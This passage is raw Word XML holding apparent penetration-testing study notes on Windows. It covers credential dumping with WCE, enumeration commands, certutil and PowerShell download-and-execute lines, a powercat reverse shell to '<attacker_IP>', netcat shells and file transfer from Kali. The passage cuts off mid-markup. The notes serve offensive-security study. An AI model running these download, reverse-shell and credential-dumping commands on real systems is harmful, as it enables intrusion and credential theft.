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BC84E" w14:textId="3303B90D" w:rsidR="00290E1B" w:rsidRDefault="000471B9">
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="000471B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Windows Credential Editor (WCE)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> to dump Window</w:t>
      </w:r>
      <w:r w:rsidR="00094739">
        <w:t xml:space="preserve">’s credentials </w:t>
      </w:r>
      <w:r>
        <w:t>from memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2522D5" w14:textId="160F2E42" w:rsidR="001912F0" w:rsidRDefault="001912F0">
      <w:r>
        <w:t>You cannot copy SAM files when Windows is running as kernel maintains exclusive access permission. But RAM based attacks are possible.</w:t>
      </w:r>
      <w:r w:rsidR="00277D3C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6E607C" w14:textId="252E2EBB" w:rsidR="006227BC" w:rsidRPr="00CC1CB3" w:rsidRDefault="006227BC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1CB3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FOLLOW STEPS MENTIONED AT</w:t>
      </w:r>
      <w:r w:rsidR="00CC1CB3" w:rsidRPr="00CC1CB3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC1CB3" w:rsidRPr="00CC1CB3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC1CB3" w:rsidRPr="00CC1CB3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00CC1CB3" w:rsidRPr="00CC1CB3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
          </w:rPr>
          <w:t>link</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CC1CB3" w:rsidRPr="00CC1CB3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> , for steps to ENUMERATE A WINDOWS BOX AND FOR PRIVILEAGE ESCALATION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D072F0E" w14:textId="2E6CB0C4" w:rsidR="00C16B89" w:rsidRDefault="00F2616E" w:rsidP="00F2616E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Windows privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BEB0A1" w14:textId="77777777" w:rsidR="00F2616E" w:rsidRDefault="003C54D7" w:rsidP="00F2616E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00F2616E" w:rsidRPr="00124458">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76C81FA3" w14:textId="41952FD8" w:rsidR="006E6F81" w:rsidRDefault="00F2616E" w:rsidP="005C0FC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Download files locally </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E108F" w14:textId="77777777" w:rsidR="006E6F81" w:rsidRDefault="006E6F81" w:rsidP="000918B3">
      <w:r>
        <w:t>When looking to download files locally, you can use path specified by %TMP</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>% ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> %TEMP%, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> root folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E031CE" w14:textId="7395EC0F" w:rsidR="000918B3" w:rsidRDefault="000918B3" w:rsidP="006E6F81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>certutils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC46320" w14:textId="7E4810ED" w:rsidR="00244A96" w:rsidRDefault="00244A96" w:rsidP="007442DE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44A9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certutil.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244A9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urlcache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244A9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-split -f http://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&lt;url&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00244A9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/exploit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE6097" w14:textId="77777777" w:rsidR="00120340" w:rsidRPr="007442DE" w:rsidRDefault="00120340" w:rsidP="007442DE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8B4CAAB" w14:textId="41B53D33" w:rsidR="00120340" w:rsidRDefault="00120340" w:rsidP="00120340">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA3A9C5" w14:textId="77777777" w:rsidR="00120340" w:rsidRDefault="00120340" w:rsidP="00120340">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check if PowerShell is allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673E76FE" w14:textId="7956290B" w:rsidR="00667970" w:rsidRDefault="00120340" w:rsidP="00667970">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00120340">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>PowerShell -command “ping &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00120340">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00120340">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;”. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Now look into your ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ for ping request from victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797188F3" w14:textId="3589A9A0" w:rsidR="00667970" w:rsidRDefault="00D3285D" w:rsidP="00D3285D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D3D33F1" wp14:editId="0B47CD50">
            <wp:extent cx="5149215" cy="242992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558" cy="244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BAA1" w14:textId="7FC23B90" w:rsidR="000918B3" w:rsidRDefault="000918B3" w:rsidP="000918B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Some more techniques are mentioned </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="000918B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762B82DB" w14:textId="6DC3CADF" w:rsidR="00120340" w:rsidRDefault="00120340" w:rsidP="00F2616E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="270"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4AB8E9" w14:textId="3C4C6EA2" w:rsidR="00F51A87" w:rsidRDefault="00F51A87" w:rsidP="00F51A87">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Get Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB77EB" w14:textId="11F2E8F2" w:rsidR="009D50BB" w:rsidRDefault="009D50BB" w:rsidP="00F51A87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3CFEDD" w14:textId="75905D06" w:rsidR="00F51A87" w:rsidRDefault="00F51A87" w:rsidP="009D50BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check If PowerShell is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>allowed.(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Steps mentioned above)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4DB839" w14:textId="75408702" w:rsidR="009D50BB" w:rsidRPr="009D50BB" w:rsidRDefault="009D50BB" w:rsidP="009D50BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Download </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="006D4072">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>powercat</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidR="00066D92">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00066D92">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">// POWERCAT works for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00066D92">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00066D92">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> v2 or later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DC6327" w14:textId="6C342820" w:rsidR="009D50BB" w:rsidRDefault="009D50BB" w:rsidP="009D50BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>NoP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>NonI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -Exec Bypass -command "IEX ((New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>System.Net.Webclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>DownloadString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">('&lt;URL of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>powercat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt;'))";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F440A6" w14:textId="5D5F6188" w:rsidR="009D50BB" w:rsidRDefault="009D50BB" w:rsidP="009D50BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powercat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to connect to attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2D9060" w14:textId="5C9C2D49" w:rsidR="009D50BB" w:rsidRDefault="009D50BB" w:rsidP="009D50BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>powercat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -c &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>attacker_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C33D62">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; -p &lt;listening port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8CB87" w14:textId="0CA18262" w:rsidR="003C54D7" w:rsidRPr="00D3285D" w:rsidRDefault="00D3285D" w:rsidP="003C54D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is available. If not, download a local copy of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Then execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for a reverse</w:t>
      </w:r>
      <w:r w:rsidR="00724E46">
        <w:t>-s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hell.  </w:t>
      </w:r>
      <w:r w:rsidR="003C54D7">
        <w:t xml:space="preserve">Refer to </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="003C54D7" w:rsidRPr="003C54D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>IPSEC Bastard Write-up</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003C54D7">
        <w:t xml:space="preserve"> for more details.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7DBADD4D" w14:textId="77777777" w:rsidR="009D50BB" w:rsidRPr="00DE1D49" w:rsidRDefault="009D50BB"/>
    <w:p w14:paraId="1315B133" w14:textId="24277D7D" w:rsidR="00DE1D49" w:rsidRDefault="00DE1D49" w:rsidP="00DE1D49">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Enumerate Windows Locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F45E2B4" w14:textId="354AD68D" w:rsidR="00C33D62" w:rsidRDefault="001F10F5">
      <w:r>
        <w:t>Steps to enumerate Windows box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2110A56D" w14:textId="2DC23418" w:rsidR="001F10F5" w:rsidRDefault="001F10F5" w:rsidP="001F10F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   // it will give OS details and what security patches are installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED291D3" w14:textId="3DD6F836" w:rsidR="00C20BF7" w:rsidRDefault="00C20BF7" w:rsidP="001F10F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">/ list all open ports. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Thus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> telling what services are running. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9ED014" w14:textId="4BC61A84" w:rsidR="00071980" w:rsidRDefault="00F0177D" w:rsidP="00071980">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> get-hotfix // list all </w:t>
      </w:r>
      <w:r w:rsidR="00BD6351">
        <w:t>security updates that is installed on a machine.</w:t>
      </w:r>
      <w:r w:rsidR="00235AFB">
        <w:t xml:space="preserve"> Hence you can know what patches are not installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F414B2" w14:textId="57502BB2" w:rsidR="00071980" w:rsidRDefault="00071980" w:rsidP="00071980">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use WMI</w:t>
      </w:r>
      <w:r w:rsidR="00DE1D49">
        <w:t xml:space="preserve"> commands. Some useful examples can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00DE1D49" w:rsidRPr="00DE1D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39A941AD" w14:textId="4C46E225" w:rsidR="00DE1D49" w:rsidRDefault="00DE1D49" w:rsidP="00071980">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You can use </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00DE1D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Nishang</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00DE1D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>PowerSploit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> modules for enumeration. However, these modules work on PowerShell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E953C" w14:textId="13D1C7BF" w:rsidR="005C0FC3" w:rsidRDefault="005C0FC3" w:rsidP="005C0FC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidRPr="005C0FC3">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> wmic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C0FC3">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:i/>
        </w:rPr>
        <w:t>qfe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C0FC3">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> list all updates installed on a Windows machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B19BBEA" w14:textId="77777777" w:rsidR="00DE1D49" w:rsidRDefault="00DE1D49" w:rsidP="00DE1D49">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183EC1D7" w14:textId="6A773D6B" w:rsidR="00DE1D49" w:rsidRDefault="005C0FC3" w:rsidP="005C0FC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Transferring</w:t>
      </w:r>
      <w:r w:rsidR="00DE1D49">
        <w:t xml:space="preserve"> files from Kali to Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63084221" w14:textId="77777777" w:rsidR="00E54D63" w:rsidRPr="00E54D63" w:rsidRDefault="00C67339" w:rsidP="00C67339">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F6C09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Using FTP to transfer file</w:t>
      </w:r>
      <w:r w:rsidR="006F6C09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73486051" w14:textId="77777777" w:rsidR="00370804" w:rsidRDefault="00C67339" w:rsidP="00E54D63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E54D63">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The Windows command-line </w:t>
      </w:r>
      <w:r w:rsidRPr="00E54D63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ftp.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00E54D63">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> supports the FTP active mode only. In the active mode, the server has to connect back to the client to establish data connection for a file transfer.</w:t>
      </w:r>
      <w:r w:rsidR="006F6C09" w:rsidRPr="00E54D6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If you are seeing 421 timeouts, it means Windows FW is blocking ‘alive’ packets. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E54D6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Hence, </w:t>
      </w:r>
      <w:r w:rsidR="006F6C09" w:rsidRPr="00E54D6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ftp won’t work. </w:t>
      </w:r>
      <w:r w:rsidR="00370804">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="242729"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>However, you can pass ftp commands via a file. This will work. See below snapshot. For details refer to OSCP study material, pg-202.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325EE99D" w14:textId="0AAFEC20" w:rsidR="00E54D63" w:rsidRDefault="00370804" w:rsidP="00E54D63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A023795" wp14:editId="6AA67A94">
            <wp:extent cx="5943600" cy="2119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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48840621" w14:textId="77777777" w:rsidR="00E54D63" w:rsidRDefault="00E54D63" w:rsidP="00E54D63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7F124CD6" w14:textId="77777777" w:rsidR="00510E01" w:rsidRDefault="00E54D63" w:rsidP="00C67339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F103FB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F103FB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E54D63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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B2ECFA" w14:textId="1CA960F2" w:rsidR="00A944C2" w:rsidRDefault="00705BFE" w:rsidP="00510E01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00510E0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start </w:t>
      </w:r>
      <w:r w:rsidR="00510E01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="242729"/>
